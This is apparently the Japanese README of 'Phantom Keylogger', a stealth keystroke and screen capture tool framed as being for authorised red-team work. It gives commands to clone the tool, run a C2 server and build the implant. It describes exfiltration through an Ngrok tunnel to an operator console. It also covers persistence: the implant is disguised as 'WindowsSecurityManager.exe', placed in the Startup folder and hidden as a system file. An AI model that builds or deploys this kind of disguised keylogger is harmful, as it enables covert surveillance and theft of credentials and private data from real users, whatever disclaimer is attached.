
Phantom Keyloggerは、高度なステルス機能を備えたキーストロークおよびビジュアルインテリジェンス収集システムです。
Phantom Keyloggerは、高度でステルス対応のキーストロークおよび視覚情報収集システムです。運用セキュリティを最優先目的として構築されており、このツールは、権限のあるレッドチーム演習において、対象システム上で最小限のフットプリントを維持しながら、持続的な監視機能を提供します。
認可された使用ケース:
- 認可された侵入テスト業務
- 書面による行動ルールがあるレッドチーム演習
- 管理された環境でのセキュリティ研究
- 防御的セキュリティ管理の検証
禁止された業務:
- 無許可の監視活動
- 違法な侵入またはデータの外部持ち出し
- 個人プライバシーの侵害
- 許可されていない攻撃的業務
オペレーターは適切な展開について全法的責任を負います
# 1. Clone operational repository
git clone https://github.com/MattiaAlessi/phantom-keylogger
cd phantom-keylogger
# 2. Install operational dependencies
pip install -r requirements.txt
# 3. Deploy C2 server
python server.py
# Generate stealth executable
python build.py
出力: dist/WindowsSecurityManager.exe
配送方法:
# Start the GUI interface
python manager.py
┌─────────────────┐ ┌──────────────────┐ ┌─────────────────┐
│ TARGET │ │ C2 TUNNEL │ │ OPERATOR │
│ │ │ │ │ │
│ ┌─────────────┐│ │ ┌─────────────┐ │ │ ┌─────────────┐│
│ │ Stealth ││ │ │ Ngrok │ │ │ │ Management ││
│ │ Keylogger ├───────►│ Tunnel ├───────►│ Console ││
│ │ ││ │ │ │ │ │ │ ││
│ └─────────────┘│ │ └─────────────┘ │ │ └─────────────┘│
└─────────────────┘ └──────────────────┘ └─────────────────┘
スタートアップフォルダ: %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\
ダイアログボックス (Win+R) で shell:startup と入力すると簡単にアクセスできます。
ファイル名: WindowsSecurityManager.exe
属性: 隠しシステムファイル